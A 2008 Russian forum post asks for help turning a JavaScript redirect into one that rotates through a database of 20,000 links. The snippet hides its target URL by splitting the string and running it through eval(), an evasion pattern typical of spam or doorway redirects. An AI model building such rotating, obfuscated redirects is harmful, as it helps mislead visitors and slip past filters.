Перейти к содержимому

Фото
- - - - -

Скрипт Редиректа с базой ( PHP )


  • Закрытая тема Тема закрыта
Пока никто не отвечал в этой теме...

#1 FankeR

FankeR

    loading...

  • Постоялец
  • 190 сообщений
  • Откуда:Digital Tallinn

Отправлено 05 Апрель 2008 - 16:58

Товарищи выручайте вот есть такой редирект скрипт
<script language='JavaScript'>function replace(string,text,by) {var strLength = string.length, txtLength = text.length;if ((strLength == 0) || (txtLength == 0)) return string;var i = string.indexOf(text);if ((!i) && (text != string.substring(0,txtLength))) return string;if (i == -1) return string;var newstr = string.substring(0,i) + by;if (i+txtLength < strLength)newstr += replace (string.substring(i+txtLength,strLength),text,by);return newstr;}var ref = document.referrer;var s1="parent.location.replace('http:";var s2="//hot.";var s3="ee')";eval(s1+s2+s3);</SCRIPT>
я хочу сделать для него специальную базу ( в базе будет 20к линков ) и при каждом заходе на этот фаил редирект вытаскивал рандомно или по очереди 1 силку ( из базы ) и ставил в скрипт редиректа. ПО русски говоря что бы при каждом заходе на редирект - фаил редиректил на разные урлы ( что есть в базе )

Всегда за помощь готов платить если потребуется, на пиво.

Помогают уже ... Спасибо всем, кто не ответил )
  • 0
Тут иногда бывает реклама ...